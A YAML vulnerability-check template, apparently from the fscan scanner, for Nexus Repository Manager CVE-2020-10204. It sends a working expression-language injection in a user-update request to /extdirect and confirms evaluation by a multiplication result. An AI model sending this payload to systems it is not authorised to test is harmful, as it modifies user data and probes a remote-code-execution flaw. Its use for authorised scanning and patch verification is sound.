mirror of https://github.com/qwqdanchun/fscan.git
21 lines
918 B
YAML
21 lines
918 B
YAML
|
name: poc-yaml-nexus-cve-2020-10204
|
||
|
set:
|
||
|
r1: randomInt(40000, 44800)
|
||
|
r2: randomInt(40000, 44800)
|
||
|
rules:
|
||
|
- method: POST
|
||
|
path: "/extdirect"
|
||
|
headers:
|
||
|
Content-Type: application/json
|
||
|
body: |
|
||
|
{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28}
|
||
|
expression: |
|
||
|
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
|
||
|
detail:
|
||
|
Affected Version: "nexus<3.21.2"
|
||
|
author: kingkk(https://www.kingkk.com/)
|
||
|
links:
|
||
|
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
|
||
|
- https://www.cnblogs.com/magic-zero/p/12641068.html
|
||
|
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|